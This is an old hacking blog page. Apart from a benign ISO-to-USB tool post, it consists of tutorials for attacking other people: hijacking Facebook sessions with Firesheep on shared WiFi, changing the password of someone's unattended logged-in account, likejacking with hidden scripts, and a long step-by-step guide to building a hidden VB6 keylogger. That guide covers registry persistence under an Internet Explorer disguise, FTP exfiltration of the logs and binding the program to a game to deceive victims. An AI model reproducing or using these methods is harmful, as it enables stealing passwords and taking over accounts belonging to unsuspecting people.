Welcome to XnonymouX Blog

Sunday, 3 November 2013

burn ISO to USB and make it bootable

By on 08:18
Program Information

ISO to USB is a free and small software that can burn the ISO image file directly to the USB drives, these USB drives include USB flash drives, memory sticks and other USB storage devices, it also supports to create a bootable USB disk with Windows operating systems. Freeware.

Burn ISO to USB disks with ease

The ISO image file is a popular image of the CD/DVD discs, an ISO file can include all the content on the disc, this software can easily burn these ISO files to a USB flash disk, makes it easy to carry and use. The program's interface is very simple, you only need select the ISO file you want to burn and the target USB drive, then click "Burn" button, an USB disk that includes all ISO image data will be created. There do not have any complicated settings, it is easy to use very much.

Bootable USB flash disks

This software currently only support Windows bootable disk, can work with both BOOTMGR and NTLDR boot mode, can create USB disk with FAT, FAT32, exFAT or NTFS file system. (When you are making a bootable USB disk, suggest you choose the FAT32 file system.)

This program have be tested with WinXP, Win7 PE and WinXP PE bootable ISO image files, it can work fine, the generated USB disk can normally boot the computers. Only a small part of the machines can boot Win7, but can not boot WinXP, these machines will display "NTLDR is missing", for this problem there is no good solution currently.

If create bootable USB disk failed, sometimes the USB disk will be unusable, you can try the following steps to recover it:



Insert your USB disk, click "Start", and then click "Control Panel".



(a) For Win7/Vista, in the "System and Security", click "Administrative Tools", and then double-click "Computer Management".



(b) For WinXP, in the "Performance and Maintenance", click "Administrative Tools", and then double-click "Computer Management".
In "Computer Management" console tree, expand "Storage", click "Disk Management".
In "Disk Management", right-click your USB disk (unallocated space), and then click "New Simple Volume", the "New Simple Volume Wizard" should appear, step-by-step, that is all.



                                      DOWNLOAD ISO TO USB FROM HERE


Saturday, 2 November 2013

Hacking any Facebook Account using Wifi

By on 23:08



Hacking any Facebook Account using Wifi

Mozilla has added a supplement(addon) that is "Firesheep" has been used for thousands of hacking email accounts. As reported by techcrunch, Firesheep has been downloaded over 104,000 times in 24 hours.

What is the Firesheep special?

Using Firesheep add on you can check any account without knowing the username and password.
Famous social network Facebook is a victim of this Firesheep.

How?

Firesheep uses the HTTP session hijacking to obtain a username and password.

What is the HTTP session hijacking?

Attacker use HTTP session hijacking attack to steal the cookies of the victim. Cookies are files containing the user name and password.

Using this method HTTP session hijacking you can hack Facebook, Google, Yahoo, Orkut, Flickr, etc., or any other email account.

How to use this Firesheep to steal the cookies?
You need this requirement:
Step 1:
Download the Firesheep file.
Right click on the file and select "Open With"
and select Mozila Firefox.


Step 2:

Once you have installed firesheep in the Firefox web browser, click View at the top, then go to the sidebar and click on Fireheep .


Step 3
Now click on the top left "Start Capture" and start to capture the session cookies of people in your WiFi network, which will show the list of cookies that are captured and have visited unsecured website known to firesheep, double-click the image and you will be logged in instantly.


That's the End !!

CHANGE FACEBOOK PASSWORD WITHOUT KNOWING THE CURRENT PASSWORD

By on 23:07
What if by chance you get a facebook user account who has not logged out from his/her email id.

You can take advantage of this golden opportunity and change his/her facebook email id password without even knowing his current password. This would help you to login in the id whenver you want.
Here are some simple steps to follow to change the password without even knowing the current passwords.



Step 1. Click the link below and open it in new tab in your browser.
CLICK HERE.


You would see something like this:-

    Steps 2. Click on Continue as shown below.

    Step 3. Just fill up the New password and confirm password and hit continue.

    Hurrah.. you just changed the password.

     Enjoy and have fun :D

Facebook Fan Pages Attack

By on 23:06
This summary is not available. Please click here to view the post.

What is Click jacking

By on 23:05

What is Click jacking


Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg​, the world isn’t likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.

 How It Work ?

The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.

Mediafire

After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore. 
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible

Properly set the var in the file if it is jumbled ?

 After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website. 

How To Run The Script ?

1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
----------------------------------------------------------------------------------------------------------------

Remove src link with your uploaded link.

5. That's it. The script is ready to go.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

How to Create A FUD Crypter and Set It Up

By on 23:04

How to Create A FUD Crypter and Set It Up

After this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable, without the victim getting suspicious. You will be able to keylog just about anyone.
This Guide will be split into 2 parts:
1. Writing your own undetectable keylogger
   - The language
   - Logging and storing
   - Uploading logs
2. Setting it up to be un-suspicious and trustworthy 
- Binding with other files 
- Making sure its existence is hidden

Before we begin I want to point out that this keylogger is NOT perfect.It will be unable to recordsome symbols  It will occasionally rearrange a letter with one another if the user types fast But the passwords should easily get through.
WRITING A KEYLOGGER !

In this guide we will be using Microsoft Visual Basic 6.0 (vb6 for short)
If you do not know/have this, dont leave just yet.
Reading this guide its not “Necessary” to have vb6 knowledge (highly recommended)


Download VB6 Torrent now.
Open up VB6 and choose standard EXE.
Put on your form:
3 timers
1 label

Image


Double-click your form (design) and you see the source of our keylogger, almost empty at this point.

Image


Go back to the design and set properties for the form
Set the form name to a few random letters (title doesnt matter)
Set Visible = false
Set ShowInTaskbar = false
This should make it invisible from the user.

Image

Go back to the source and write the following in the “Form_Load” sub
If app.previnstance = true then end

app.taskvisible = false
Which means that if its already running and opened again, it will not start another keylogger (2 keyloggers running would cause errors), and it will not show in the taskmanagers Program list (but still in process list)
Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar
There are 2 effective methods to keylog with VB6

- Keyhooks
- GetAsyncKeyState

We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section

GetAsyncKeyState Declaration:

^ tells what Lib we need for GetAsyncKeyState.
With this code placed we can start using GetAsyncKeyState commands.
To find out what key is pressed we need to use getasynckeystate as so:
If GetAsyncKeyState(number) <> 0 then
‘code to execute if key is pressed
end if
Now you might be wondering what the “number” means, actually, the number we type here is a keyboard key, you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)
Full list of KeyCode values Thats alot of keycode. Now, theres an easy way of checking all of the keys at the same time. But it appears that doing it causes alot of weird symbols and capital letters only. But i want it done properly so I am going to check One key at a time. You can decide yourself what you want to do.I will show you the easy method too later on tho. Now that we know how to check for a keypress we want it to write it down somewheres temporary. There are many ways to do so, i will be using a label. You can use a String aswell. Set the caption of the label to nothing. Now a full example of the letter “a” would be this:


if GetAsyncKeyState(65) <> 0 then label1.caption = label1.caption + “a” end if

So that if “a” key is pressed an “a” is added to our label. Code 65-90 is a-z To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds).
You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer If you have less interval, it might double record the keystroke, if you have more, it might miss it. To start writing to a timer either choose “timer1” in the scrollbar in the top-left corner ofthe source page, or double-click the timer icon on the form design Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad) Now it records letters and numbers, not bad, but we are far from done yet. If we finished up now our logs would be one big pile of letters, pretty much unreadable. So what we need to do is add spaces, and a hell lot of em. The user browses around alot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with alot of spaces. So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks. Now, were not done just yet. We want to check if a letter isCapital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead. Now to do this, we want to use booleans (true / false), so goto the general section and write this: The keycode for capsLock is 20. We want to write capslock like this in the timer.
if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + “(/caps)”
caps = false
goto a
end if
label1.caption = label1.caption + “(caps)”
caps = true
end if
a:
The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean “caps” to “True”. The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets “caps” to “False”. That way you will know that the letters between (caps) and (/caps) is allcapital . Nice! Everytime Caps-lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean. Its a little different with shift. Shift has the keycode 16 btw. dim “shift” as boolean inthe general section. just like before.
If GetasyncKeyState(16) <> 0 then 
shift = true end if
So if Shift is pressed the “shift” boolean becomes true. now in all codes checking for letters add this: example with “a” key:
if GetAsyncKeyState(65) <> 0 then
if shift = true then
label1.caption = label1.caption + “A”
shift = false
goto b
end if
label1.caption = label1.caption + “a”
end if
b:
(remember to use a different letter(s) in the goto commands every time) So if Shift has been pressed, the next key being pressed will becapital.
Nice!
NOTE: You can do this with numbers too to get their symbol instead. You should now have in your timer, checking for a-z (all with shift check), alot of keys making spaces, capslock check, 0-9. Now. 2 very important keycodes are missing on the site, so i put them here Dot: Getasynckeystate(190) Comma: Getasynckeystate(188) We are now able to go to the next step. Writing to a Text Document. Having the logs in a label is not enough. We need to write it to a text-file every now and then. This process is really simple actually. Open up the source for the second timer (Timer2) and write following. I will explain below the quote.

On Error Go To skip
If Dir(“c:\windows\klogs.txt”) <> “” Then
Open “c:\windows\klogs.txt” For Append As #1
Write #1, Label1.Caption  
Close #1
Else
Open “c:\windows\klogs.txt” For Output As #1
Write #1, DateTime.Time
Write #1, Write #1, Label1.Caption
Close #1
End If
Label1.Caption = “”
skip:


don’t worry, ill explain. The DIR command checks if a file exists. if it exists it executes the code below it, if it does not exist, it executes the code below “Else” the “Open” creates/opens a textfile, in this case, klogs.txt, you can change this. you can also change the location of it. Just locate it somewhere that the victim wont look. the “for output as #1” just gives the file a number so it knows what file to write to later on (incase more files are open), Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the textfile. Also as you may notice, if the file does not exist then it writes the time of day into the file. This is useful for keeping track of when the specific log were from. In this case we only use Output and Append
“write #1, label1.caption” this writes the content of our label into file #1. “close #1” closes the file. ‘Label1.caption = “” ’ This deletes the content of our label1 which stores the info. We dont wanna write the same stuff to it again.
Now dont worry. all of this writing and creating happens invisibly. I suggest doing this every 30-60 seconds. (30 seconds = interval of 30000 on the timer) As said above, we write the Time of day into the log file to help os keep track of it. When the file is first created it will write the time into it. But thats not quite good enough. for us. We want it to write the time of date into the file every Time the keylogger is being opened again (usually after shutdown) So write this to the “Form_Load”: So now it stores Time marks every time its opened. NEAT! now every 30-60 seconds all logs is stored in a text document. At this point you should try debugging the file. (little blue triangle button)

Image


you will see nothing. but the keylogger is running.. try opening notepad or something and type something. after a minute or so, stop debugging (square button right of the debug button) and check the textfile (at your chosen location) it should contain everything you wrote. If not. Re-Check the last steps. Now. an important thing we must not forget is to make it run on startup =) there are 2 ways to do that, i will explain them both and let you choose which one to use. 1: Registry keys Here we copy the file to system32 and add an autorun reg-key to it so it starts when you start the computer. here how to do it: First we want to see if it already has one start up key. go to the Form_Load section again and write this:
if Dir(“c:\windows\system32\Internet Explorer.exe”) <> “” then
else
regist
end if
This means that if the file in system32 (Internet Explorer.exe) already exists (will explain the name later) then it does nothing but if the file does not exist, it calls the sub called “regist”. which copies the file and add a registry key to it. We’re gonna write the “regist” sub now: add this at the bottom of the code:
Private Sub regist() 
Dim regkey 
FileCopy App.Path & “" & App.EXEName & “.exe”, “C:\windows\system32\Internet Explorer.exe” 
Set regkey = CreateObject(“wscript.shell”) 
regkey.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Explorer.exe”, “c:\windows\system32\Internet Explorer.exe” 
End Sub
This copies the file iteself to system32 as Internet Explorer.exe (will explain in a moment), and then adds an autorun key to it. That,s basically the registry method.

Here is the Other method.
2: Copy to start up method. again, start with going to the Form_Load (IF you choose to use this method) and add “startup” which calls the start up sub we are about to make. Make a new sub called startup at the bottom of the code, like this: This searches for the Special folder “startup” and copies itself to there with the Internet Explorer name, If you want you can add VB attributes (setattr commands), like vbhidden or vbsystem. but i don’t recommend that Because i had some problems with those attributes myself

Now choose one of the methods for startup (not both of them tho) and move on.
Now The final part is the most important one.
This is where we Upload the textfile to our FTP account.
You MUST have your own ftp account for this part.
I suggest using http://www.0catch.com (its a zero), there you can create a free account.
Create a free ftp account there.
Once you have your FTP account.
We need to add a Internet Transfer Control component to our form.
You do that by going to Project » Components. (ctrl + T) Find Microsoft Internet Transfer Control 6.0 and Tick it

Image

press ok.
Now a new item is available in the toolbox (Inet).
drag it to your form.
select properties for it:
Protocol: icFTP
Username: Username.0catch.com (your 0catch username)
Password: your 0catch
Password Remotehost: www.0catch.com and thats it.
Now the “URL” should say something like this:
ftp://username.0catch.com:password@0catch.com

Now we are connected to the FTP when executed.
We must use this connection to upload the logs to the FTP. we want to do that about every 90 seconds (since 90 seconds is max interval in timers). set Timer3’s interval to 90000 (1ร‚½ minute) or less. then in Timer3’s source write this:
On error resume next
Inet1.Execute , “PUT c:\windows\klogs.txt /” & DateTime.Date & “.txt”
Now, this finds our log (klogs.txt) and uploads it to the selected FTP, the files name will be the date of the day it is being run. This is so we can prevent overwriting previous logs by creating a new log for every day. This also makes it easier to find the log you need.
The “On error resume next” prevents the program from crashing if one log fails to upload. but instead tries again (errors happen rarely tho, but recommended to have) if you have a sub folder for the logs you can type “/subfolder/” & DateTime.Date & “.txt” Was that it? YES! its really that easy to upload a file. woowee!
Now. in the “LOAD” part add this:
label1.caption = “”
To make sure the label is empty when opened.
Now i promised also to show the lazy way.. which is not as good.
I DO NOT RECOMMEND USING THIS: this method uses Integer and a loop to do all keys.
In this method “i” is 1-120. “i” starts being 1, and every time it reaches the next command it starts at “for” as 1 higher. untill 120.
All letters will be caps and a lot of weird symbols will appear. “chr(i)” chr = character, “i” is again, the keycode.
AGAIN: I RECOMMEND IGNORING THIS PART OF THE GUIDE. its not that good.
Now, go to the design again and click the form itself (not any of the items inside the form) look through the options and find the Icon option. change the icon to Internet Explorer Icon
Guess what. were almost done.
We now should have a very undetectable keylogger (80-95% UD) NICE!. give it a test shot on your own computer by saving it as .EXE to your computer (debugging wont work now since we made it copy itself). At this point you should save the project to your computer, you can also make the EXE file.(Save as Internet Explorer.exe) That,s it for the first part. Get ready for part 2!

Setting it up to be trustworthy !

Now. An EXE file that appears to do nothing when opened seems a little suspicious, doesnt it? So there is a few ways to disguise it. 1. Binding it with another file. 2. Writing another program into it in VB6.
I prefer the first solution since it takes a long time to make it look like the game etc. closes when close button pressed. And it would take multiple forms as well.. so we will stick with Binding with another file or game of yours.

DO NOT use minor binding tools like Fresh Bind or alike.
Many of these makes the output detectable..
USE nBinder PRO, nBinder only makes it slightly more detectable.
Once you have nBinder PRO its time to make the keylogger EXE.
You do that in file » make project.EXE (Save as Internet Explorer.exe, will explain..) when the EXE is created its time to find a file (preferably a game or alike) to bind it with.

Open Up nBINDER PRO.
Add the keylogger and the file to be bound with.
Right click the Keylogger (inside nBINDER) and select Options.

Tick “Execute” box (if not already ticked) and Tick “Start visible” box (if not already ticked)

Untick “Delete file at next boot” if you want the keylogger to stay in the file after first boot.
Now select options on the other file.
IMPORTANT: Tick EXECUTE and “START VISIBLE” here.
UNtick delete at next boot.
Now select iconfile and output name, compress the file.
Almost done now.
The reason it should be called Internet Explorer.exe and have Internet explorer icon (and copy as internet explorer.exe for that matter) is because some firewalls detects the FTP file uploading. and when the time comes when firewall asks if you want to allow the program internet connection, it will ask: Internet explorer is trying to access the internet .
Block / Remove Block. and display Internet Explorer icon.
That way it looks like its just IE that tries to get to the internet.. you can use other browsers for this as-well.. or messenger etc. Now my friend. when the file is executed. The game (or w/e) will launch immediately. when the game is exited the keylogger starts logging invisible. (and is copied to start-up / added a regkey) The victim shouldn’t notice a thing. and very soon you will be the owner of their passwords. 

Finally the Part Where I Have TO Thank All The People Who helped me In This Post . Although they didnt want any . But I must